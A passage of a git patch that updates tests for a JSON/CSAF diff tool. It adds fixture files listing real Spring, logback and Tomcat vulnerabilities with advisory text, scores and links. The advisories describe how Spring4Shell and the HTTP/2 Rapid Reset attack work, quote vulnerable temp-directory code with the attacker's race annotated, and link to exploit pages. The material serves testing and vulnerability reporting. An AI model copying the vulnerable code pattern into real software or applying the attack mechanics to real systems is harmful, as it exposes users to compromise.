From 15faf3722e53a4f1885130624ad78e867d6c1354 Mon Sep 17 00:00:00 2001
From: Caroline Russell
Date: Mon, 7 Oct 2024 04:07:48 -0400
Subject: [PATCH] Updating and improving tests.

Signed-off-by: Caroline Russell
---
test/csaf_3.json | 1 +
test/csaf_4.json | 1 +
test/test_bom_diff.py | 6 +-
test/test_csaf_diff.py | 410 ++++++++++++++++------------------
test/test_custom_json_diff.py | 16 +-
test/test_data.json | 2 +-
6 files changed, 218 insertions(+), 218 deletions(-)
create mode 100644 test/csaf_3.json
create mode 100644 test/csaf_4.json
diff --git a/test/csaf_3.json b/test/csaf_3.json
new file mode 100644
index 0000000..3d1583a
--- /dev/null
+++ b/test/csaf_3.json
@@ -0,0 +1 @@ +{"document":{"aggregate_severity":{"text":"Critical"},"category":"csaf_vex","csaf_version":"2.0","lang":"en","notes":[{"category":"legal_disclaimer","text":"Depscan reachable code only covers the project source code, not the code of dependencies. A dependency may execute vulnerable code when called even if it is not in the project's source code. Regard the Depscan-set flag of 'code_not_in_execute_path' with this in mind."}],"publisher":{"category":"vendor","contact_details":"vendor@mcvendorson.com","name":"Vendor McVendorson","namespace":"https://appthreat.com"},"references":[{"summary":"website","url":"http://projects.spring.io/spring-boot/java-sec-code/"},{"summary":"vcs","url":"https://github.com/spring-projects/spring-boot/spring-boot-starter-parent/java-sec-code"}],"title":"Your Title","tracking":{"current_release_date":"2024-10-01T02:41:17","id":"2024-10-01T02:41:17_v1","initial_release_date":"2024-10-01T02:41:17","revision_history":[],"status":"draft","version":"1"}},"product_tree":{"full_product_names":[{"name":"java-sec-code","product_id":"java-sec-code:1.0.0","product_identification_helper":{"purl":"pkg:maven/sec/java-sec-code@1.0.0?type=jar"}}]},"vulnerabilities":[{"acknowledgements":[{"organization":"Vmware","urls":["https://tanzu.vmware.com/security/cve-2022-22965"]}],"cve":"CVE-2022-22965","cwe":{"id":"74","name":"Improper Neutralization of Special Elements in Output Used by a Downstream Component"},"discovery_date":"2022-03-31T18:30:50","ids":[{"system_name":"CVE Record","text":"CVE-2022-22965"},{"system_name":"Sonicwall Advisory","text":"SNWLID-2022-0005"},{"system_name":"Cisco Advisory","text":"cisco-sa-java-spring-rce-Zx9GUc67"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Vmware Advisory","text":"cve-2022-22965"},{"system_name":"Siemens Advisory","text":"ssa-254054"}],"notes":[{"audience":"developers","category":"other","text":"Improper Control of 
Generation of Code","title":"Additional CWE: 94"},{"category":"description","details":"Vulnerability Description","text":"Remote Code Execution in Spring Framework"},{"category":"details","details":"Vulnerability Details","text":"# Remote Code Execution in Spring Framework Spring Framework prior to versions 5.2.20 and 5.3.18 contains a remote code execution vulnerability known as `Spring4Shell`. ## Impact A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. These are the prerequisites for the exploit: - JDK 9 or higher - Apache Tomcat as the Servlet container - Packaged as WAR - `spring-webmvc` or `spring-webflux` dependency ## Patches - Spring Framework [5.3.18](https://github.com/spring-projects/spring-framework/releases/tag/v5.3.18) and [5.2.20](https://github.com/spring-projects/spring-framework/releases/tag/v5.2.20.RELEASE) - Spring Boot [2.6.6](https://github.com/spring-projects/spring-boot/releases/tag/v2.6.6) and [2.5.12](https://github.com/spring-projects/spring-boot/releases/tag/v2.5.12) ## Workarounds For those who are unable to upgrade, leaked reports recommend setting `disallowedFields` on `WebDataBinder` through an `@ControllerAdvice`. This works generally, but as a centrally applied workaround fix, may leave some loopholes, in particular if a controller sets `disallowedFields` locally through its own `@InitBinder` method, which overrides the global setting. To apply the workaround in a more fail-safe way, applications could extend `RequestMappingHandlerAdapter` to update the `WebDataBinder` at the end after all other initialization. 
In order to do that, a Spring Boot application can declare a `WebMvcRegistrations` bean (Spring MVC) or a `WebFluxRegistrations` bean (Spring WebFlux)."}],"product_status":{"known_affected":["org.springframework.boot/spring-boot-starter-web@vers:maven/>=1.0.0.RELEASE|<=2.5.9"]},"references":[{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/166713/Spring4Shell-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/167011/Spring4Shell-Spring-Framework-Class-Property-Remote-Code-Execution.html"},{"summary":"Siemens Advisory ssa-254054","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-254054.pdf"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22965"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22965"},{"summary":"Sonicwall Advisory SNWLID-2022-0005","url":"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0005"},{"summary":"Vmware Advisory cve-2022-22965","url":"https://tanzu.vmware.com/security/cve-2022-22965"},{"summary":"Cisco Advisory cisco-sa-java-spring-rce-Zx9GUc67","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory 
cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.springframework.boot/spring-boot-starter-web@vers:maven/>=1.0.0.RELEASE|<=2.5.9"]}],"title":"CVE-2022-22965/pkg:maven/org.springframework.boot/spring-boot-starter-web@1.5.1.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-27772"]}],"cve":"CVE-2022-27772","cwe":{"id":"377","name":"Insecure Temporary File"},"discovery_date":"2022-07-11T20:59:02","ids":[{"system_name":"CVE Record","text":"CVE-2022-27772"},{"system_name":"GitHub Advisory","text":"GHSA-cm59-pr5q-cw85"}],"notes":[{"audience":"developers","category":"other","text":"Creation of Temporary File in Directory with Insecure Permissions","title":"Additional CWE: 379"},{"audience":"developers","category":"other","text":"Exposure of Resource to Wrong Sphere","title":"Additional CWE: 668"},{"category":"description","details":"Vulnerability Description","text":"Temporary Directory Hijacking to Local Privilege Escalation Vulnerability in org.springframework.boot:spring-boot"},{"category":"details","details":"Vulnerability Details","text":"# Temporary Directory Hijacking to Local Privilege Escalation Vulnerability in 
org.springframework.boot:spring-boot spring-boot versions prior to version `v2.2.11.RELEASE` was vulnerable to temporary directory hijacking. This vulnerability impacted the `org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir` method. The vulnerable method is used to create a work directory for embedded web servers such as Tomcat and Jetty. The directory contains configuration files, JSP/class files, etc. If a local attacker got the permission to write in this directory, they could completely take over the application (ie. local privilege escalation). #### Impact Location This vulnerability impacted the following source location: ```java /** * Return the absolute temp dir for given web server. * @param prefix server name * @return the temp dir for given server. */ protected final File createTempDir(String prefix) { try { File tempDir = File.createTempFile(prefix + \".\", \".\" + getPort()); tempDir.delete(); tempDir.mkdir(); tempDir.deleteOnExit(); return tempDir; } ``` \\- https://github.com/spring-projects/spring-boot/blob/ce70e7d768977242a8ea6f93188388f273be5851/spring-boot-project/spring-boot/src/main/java/org/springframework/boot/web/server/AbstractConfigurableWebServerFactory.java#L165-L177 This vulnerability exists because `File.mkdir` returns `false` when it fails to create a directory, it does not throw an exception. As such, the following race condition exists: ```java File tmpDir =File.createTempFile(prefix + \".\", \".\" + getPort()); // Attacker knows the full path of the file that will be generated // delete the file that was created tmpDir.delete(); // Attacker sees file is deleted and begins a race to create their own directory before Jetty. // and make a directory of the same name // SECURITY VULNERABILITY: Race Condition! - Attacker beats java code and now owns this directory tmpDir.mkdirs(); // This method returns 'false' because it was unable to create the directory. No exception is thrown. 
// Attacker can write any new files to this directory that they wish. // Attacker can read any files created by this process. ``` ### Prerequisites This vulnerability impacts Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users. ### Patches This vulnerability was inadvertently fixed as a part of this patch: https://github.com/spring-projects/spring-boot/commit/667ccdae84822072f9ea1a27ed5c77964c71002d This vulnerability is patched in versions `v2.2.11.RELEASE` or later. ### Workarounds Setting the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability for all operating systems."}],"product_status":{"known_affected":["org.springframework.boot/spring-boot@vers:maven/>=1.0.0.RELEASE|<=2.2.9.RELEASE"]},"references":[{"summary":"GitHub Advisory GHSA-cm59-pr5q-cw85","url":"https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-cm59-pr5q-cw85"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-27772"},{"summary":"CVE 
Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-27772"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":7.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.9,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"CHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"CHANGED","temporalScore":7.8,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H","version":"3.1"},"products":["org.springframework.boot/spring-boot@vers:maven/>=1.0.0.RELEASE|<=2.2.9.RELEASE"]}],"title":"CVE-2022-27772/pkg:maven/org.springframework.boot/spring-boot@1.5.1.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-20883"]}],"cve":"CVE-2023-20883","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2023-05-26T18:30:21","ids":[{"system_name":"CVE Record","text":"CVE-2023-20883"},{"system_name":"NetApp Advisory","text":"ntap-20230703-0008"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Spring Boot Welcome Page Denial of Service"},{"category":"details","details":"Vulnerability Details","text":"# Spring Boot Welcome Page Denial of Service In Spring Boot versions 3.0.0 - 3.0.6, 2.7.0 - 2.7.11, 2.6.0 - 2.6.14, 2.5.0 - 2.5.14 and older unsupported versions, there is potential for a denial-of-service (DoS) attack if Spring MVC is used together with a reverse proxy cache. Specifically, an application is vulnerable if all of the conditions are true: * The application has Spring MVC auto-configuration enabled. This is the case by default if Spring MVC is on the classpath. 
* The application makes use of Spring Boot's welcome page support, either static or templated. * Your application is deployed behind a proxy which caches 404 responses. Your application is NOT vulnerable if any of the following are true: * Spring MVC auto-configuration is disabled. This is true if WebMvcAutoConfiguration is explicitly excluded, if Spring MVC is not on the classpath, or if spring.main.web-application-type is set to a value other than SERVLET. * The application does not use Spring Boot's welcome page support. * You do not have a proxy which caches 404 responses. Affected Spring Products and Versions Spring Boot 3.0.0 to 3.0.6 2.7.0 to 2.7.11 2.6.0 to 2.6.14 2.5.0 to 2.5.14 Older, unsupported versions are also affected Mitigation Users of affected versions should apply the following mitigations: * 3.0.x users should upgrade to 3.0.7+ * 2.7.x users should upgrade to 2.7.12+ * 2.6.x users should upgrade to 2.6.15+ * 2.5.x users should upgrade to 2.5.15+ Users of older, unsupported versions should upgrade to 3.0.7+ or 2.7.12+. 
Workarounds: configure the reverse proxy not to cache 404 responses and/or not to cache responses to requests to the root (/) of the application."}],"product_status":{"known_affected":["org.springframework.boot/spring-boot-autoconfigure@vers:maven/>=1.0.0.RELEASE|<=2.5.9"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-20883"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-20883"},{"summary":"NetApp Advisory ntap-20230703-0008","url":"https://security.netapp.com/advisory/ntap-20230703-0008"},{"summary":"Cve 2023","url":"https://spring.io/security/cve-2023-20883"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.springframework.boot/spring-boot-autoconfigure@vers:maven/>=1.0.0.RELEASE|<=2.5.9"]}],"title":"CVE-2023-20883/pkg:maven/org.springframework.boot/spring-boot-autoconfigure@1.5.1.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-6378"]}],"cve":"CVE-2023-6378","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2023-11-29T12:30:16","ids":[{"system_name":"CVE Record","text":"CVE-2023-6378"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"logback serialization 
vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# logback serialization vulnerability A serialization vulnerability in logback receiver component part of logback allows an attacker to mount a Denial-Of-Service attack by sending poisoned data. This is only exploitable if logback receiver component is deployed. See https://logback.qos.ch/manual/receivers.html"}],"product_status":{"known_affected":["ch.qos.logback/logback-classic@vers:maven/>=0.2.5|<=1.2.12"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-6378"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-6378"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":7.1,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.1,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"CHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"CHANGED","temporalScore":7.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H","version":"3.1"},"products":["ch.qos.logback/logback-classic@vers:maven/>=0.2.5|<=1.2.12"]}],"title":"CVE-2023-6378/pkg:maven/ch.qos.logback/logback-classic@1.1.9?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-42550"]}],"cve":"CVE-2021-42550","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-17T20:00:50","ids":[{"system_name":"CVE Record","text":"CVE-2021-42550"},{"system_name":"NetApp Advisory","text":"ntap-20211229-0001"},{"system_name":"Siemens 
Advisory","text":"ssa-371761"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of Untrusted Data in logback"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of Untrusted Data in logback In logback version 1.2.7 and prior versions, an attacker with the required privileges to edit configurations files could craft a malicious configuration allowing to execute arbitrary code loaded from LDAP servers."}],"product_status":{"known_affected":["ch.qos.logback/logback-core@vers:maven/>=0.2.5|<=1.2.8"]},"references":[{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html"},{"summary":"Seclists Exploit","url":"http://seclists.org/fulldisclosure/2022/Jul/11"},{"summary":"Siemens Advisory ssa-371761","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-371761.pdf"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-42550"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-42550"},{"summary":"NetApp Advisory 
ntap-20211229-0001","url":"https://security.netapp.com/advisory/ntap-20211229-0001"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.6,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":6.6,"environmentalSeverity":"MEDIUM","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"HIGH","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"HIGH","scope":"UNCHANGED","temporalScore":6.6,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["ch.qos.logback/logback-core@vers:maven/>=0.2.5|<=1.2.8"]}],"title":"CVE-2021-42550/pkg:maven/ch.qos.logback/logback-core@1.1.9?type=jar"},{"cve":"CVE-2023-44487","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2023-10-10T21:28:24","ids":[{"system_name":"Microsoft Advisory","text":"2"},{"system_name":"Hashicorp Advisory","text":"59715"},{"system_name":"Swift Advisory","text":"67764"},{"system_name":"Amazon Advisory","text":"AWS-2023-011"},{"system_name":"CVE Record","text":"CVE-2023-44487"},{"system_name":"GitHub Advisory","text":"GHSA-2m7v-gc89-fjqf"},{"system_name":"GitHub Advisory","text":"GHSA-qppj-fm5r-hxr3"},{"system_name":"GitHub Advisory","text":"GHSA-vx74-f528-fxqg"},{"system_name":"GitHub Advisory","text":"GHSA-xpw8-rcwv-8f8p"},{"system_name":"Phoronix Advisory","text":"HTTP2-Rapid-Reset-Attack"},{"system_name":"F5 Advisory","text":"K000137106"},{"system_name":"Freebsd Advisory","text":"commit"},{"system_name":"Red Hat Advisory","text":"cve-2023-44487"},{"system_name":"Qualys Advisory","text":"cve-2023-44487-http-2-rapid-reset-attack"},{"system_name":"Debian Advisory","text":"dsa-5521"},{"system_name":"Debian 
Advisory","text":"dsa-5522"},{"system_name":"Debian Advisory","text":"dsa-5540"},{"system_name":"Debian Advisory","text":"dsa-5549"},{"system_name":"Debian Advisory","text":"dsa-5558"},{"system_name":"Debian Advisory","text":"dsa-5570"},{"system_name":"Gentoo Advisory","text":"glsa-202311-09"},{"system_name":"Google Advisory","text":"google-cloud-mitigated-largest-ddos-attack-peaking-above-398-million-rps"},{"system_name":"Haproxy Advisory","text":"haproxy-is-not-affected-by-the-http-2-rapid-reset-attack-cve-2023-44487"},{"system_name":"Arstechnica Advisory","text":"how-ddosers-used-the-http-2-protocol-to-deliver-attacks-of-unprecedented-size"},{"system_name":"Google Advisory","text":"how-it-works-the-novel-http2-rapid-reset-ddos-attack"},{"system_name":"Nginx Advisory","text":"http-2-rapid-reset-attack-impacting-f5-nginx-products"},{"system_name":"Openssf Advisory","text":"http-2-rapid-reset-vulnerability-highlights-need-for-rapid-response"},{"system_name":"Theregister Advisory","text":"http2_rapid_reset_zeroday"},{"system_name":"Seanmonstar Advisory","text":"hyper-http2-rapid-reset-unaffected"},{"system_name":"Darkreading Advisory","text":"internet-wide-zero-day-bug-fuels-largest-ever-ddos-event"},{"system_name":"Eclipse Advisory","text":"msg00181"},{"system_name":"Netlify Advisory","text":"netlify-successfully-mitigates-cve-2023-44487"},{"system_name":"Bleepingcomputer Advisory","text":"new-http-2-rapid-reset-zero-day-attack-breaks-ddos-records"},{"system_name":"NetApp Advisory","text":"ntap-20231016-0001"},{"system_name":"NetApp Advisory","text":"ntap-20240426-0007"},{"system_name":"NetApp Advisory","text":"ntap-20240621-0006"},{"system_name":"NetApp Advisory","text":"ntap-20240621-0007"},{"system_name":"Proxmox Bugzilla","text":"proxmox-bugzilla-4988"},{"system_name":"Litespeedtech Advisory","text":"rapid-reset-http-2-vulnerablilty"},{"system_name":"Red Hat Bugzilla","text":"redhat-bugzilla-2242803"},{"system_name":"Suse 
Bugzilla","text":"suse-bugzilla-1216123"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"HTTP/2 Stream Cancellation Attack"},{"category":"details","details":"Vulnerability Details","text":"# HTTP/2 Stream Cancellation Attack ## HTTP/2 Rapid reset attack The HTTP/2 protocol allows clients to indicate to the server that a previous stream should be canceled by sending a RST_STREAM frame. The protocol does not require the client and server to coordinate the cancellation in any way, the client may do it unilaterally. The client may also assume that the cancellation will take effect immediately when the server receives the RST_STREAM frame, before any other data from that TCP connection is processed. Abuse of this feature is called a Rapid Reset attack because it relies on the ability for an endpoint to send a RST_STREAM frame immediately after sending a request frame, which makes the other endpoint start working and then rapidly resets the request. The request is canceled, but leaves the HTTP/2 connection open. The HTTP/2 Rapid Reset attack built on this capability is simple: The client opens a large number of streams at once as in the standard HTTP/2 attack, but rather than waiting for a response to each request stream from the server or proxy, the client cancels each request immediately. The ability to reset streams immediately allows each connection to have an indefinite number of requests in flight. By explicitly canceling the requests, the attacker never exceeds the limit on the number of concurrent open streams. The number of in-flight requests is no longer dependent on the round-trip time (RTT), but only on the available network bandwidth. In a typical HTTP/2 server implementation, the server will still have to do significant amounts of work for canceled requests, such as allocating new stream data structures, parsing the query and doing header decompression, and mapping the URL to a resource. 
For reverse proxy implementations, the request may be proxied to the backend server before the RST_STREAM frame is processed. The client on the other hand paid almost no costs for sending the requests. This creates an exploitable cost asymmetry between the server and the client. Multiple software artifacts implementing HTTP/2 are affected. This advisory was originally ingested from the `swift-nio-http2` repo advisory and their original conent follows. ## swift-nio-http2 specific advisory swift-nio-http2 is vulnerable to a denial-of-service vulnerability in which a malicious client can create and then reset a large number of HTTP/2 streams in a short period of time. This causes swift-nio-http2 to commit to a large amount of expensive work which it then throws away, including creating entirely new `Channel`s to serve the traffic. This can easily overwhelm an `EventLoop` and prevent it from making forward progress. swift-nio-http2 1.28 contains a remediation for this issue that applies reset counter using a sliding window. This constrains the number of stream resets that may occur in a given window of time. Clients violating this limit will have their connections torn down. This allows clients to continue to cancel streams for legitimate reasons, while constraining malicious actors. 
## Related CVE(s) BIT-apisix-2023-44487, BIT-aspnet-core-2023-44487, BIT-contour-2023-44487, BIT-dotnet-2023-44487, BIT-dotnet-sdk-2023-44487, BIT-envoy-2023-44487, BIT-golang-2023-44487, BIT-jenkins-2023-44487, BIT-kong-2023-44487, BIT-nginx-2023-44487, BIT-nginx-ingress-controller-2023-44487, BIT-node-2023-44487, BIT-solr-2023-44487, BIT-tomcat-2023-44487, BIT-varnish-2023-44487, CVE-2023-44487"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.94"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.94"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/13/4"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/13/9"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/18/4"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/18/8"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/19/6"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/20/8"},{"summary":"Red Hat Advisory cve-2023-44487","url":"https://access.redhat.com/security/cve/cve-2023-44487"},{"summary":"Arstechnica Advisory how-ddosers-used-the-http-2-protocol-to-deliver-attacks-of-unprecedented-size","url":"https://arstechnica.com/security/2023/10/how-ddosers-used-the-http-2-protocol-to-deliver-attacks-of-unprecedented-size"},{"summary":"Amazon Advisory AWS-2023-011","url":"https://aws.amazon.com/security/security-bulletins/AWS-2023-011"},{"summary":"Litespeedtech Advisory rapid-reset-http-2-vulnerablilty","url":"https://blog.litespeedtech.com/2023/10/11/rapid-reset-http-2-vulnerablilty"},{"summary":"Qualys Advisory 
cve-2023-44487-http-2-rapid-reset-attack","url":"https://blog.qualys.com/vulnerabilities-threat-research/2023/10/10/cve-2023-44487-http-2-rapid-reset-attack"},{"summary":"Cve 2023","url":"https://blog.vespa.ai/cve-2023-44487"},{"summary":"Proxmox Bugzilla","url":"https://bugzilla.proxmox.com/show_bug.cgi?id=4988"},{"summary":"Red Hat Bugzilla","url":"https://bugzilla.redhat.com/show_bug.cgi?id=2242803"},{"summary":"Suse Bugzilla","url":"https://bugzilla.suse.com/show_bug.cgi?id=1216123"},{"summary":"Freebsd Advisory","url":"https://cgit.freebsd.org/ports/commit/?id=c64c329c2c1752f46b73e3e6ce9f4329be6629f9"},{"summary":"Google Advisory google-cloud-mitigated-largest-ddos-attack-peaking-above-398-million-rps","url":"https://cloud.google.com/blog/products/identity-security/google-cloud-mitigated-largest-ddos-attack-peaking-above-398-million-rps"},{"summary":"Google Advisory how-it-works-the-novel-http2-rapid-reset-ddos-attack","url":"https://cloud.google.com/blog/products/identity-security/how-it-works-the-novel-http2-rapid-reset-ddos-attack"},{"summary":"Hashicorp Advisory 59715","url":"https://discuss.hashicorp.com/t/hcsec-2023-32-vault-consul-and-boundary-affected-by-http-2-rapid-reset-denial-of-service-vulnerability-cve-2023-44487/59715"},{"summary":"Swift Advisory 67764","url":"https://forums.swift.org/t/swift-nio-http2-security-update-cve-2023-44487-http-2-dos/67764"},{"summary":"GitHub Advisory GHSA-qppj-fm5r-hxr3","url":"https://github.com/advisories/GHSA-qppj-fm5r-hxr3"},{"summary":"GitHub Advisory GHSA-vx74-f528-fxqg","url":"https://github.com/advisories/GHSA-vx74-f528-fxqg"},{"summary":"GitHub Advisory GHSA-xpw8-rcwv-8f8p","url":"https://github.com/advisories/GHSA-xpw8-rcwv-8f8p"},{"summary":"GitHub Advisory GHSA-qppj-fm5r-hxr3","url":"https://github.com/apple/swift-nio-http2/security/advisories/GHSA-qppj-fm5r-hxr3"},{"summary":"GitHub Advisory 
GHSA-2m7v-gc89-fjqf","url":"https://github.com/h2o/h2o/security/advisories/GHSA-2m7v-gc89-fjqf"},{"summary":"Google Mailing List","url":"https://groups.google.com/g/golang-announce/c/iNNxDTCjZvo"},{"summary":"Google Mailing List","url":"https://groups.google.com/g/golang-announce/c/iNNxDTCjZvo/m/UDd7VKQuAAAJ"},{"summary":"Cve 2023","url":"https://linkerd.io/2023/10/12/linkerd-cve-2023-44487"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/5py8h42mxfsn8l1wy6o41xwhsjlsd87q"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00023.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00024.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00045.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00047.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/11/msg00001.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/11/msg00012.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2MBEPPC36UBVOZZNAXFHKLFGSLCMN5LI"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3N4NJ7FR4X4FPZUGNTQAPSTVB2HB2Y4A"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BFQD3KUEMFBHPAPBGLWQC34L4OWL5HAZ"},{"summary":"Fedora Project Mailing 
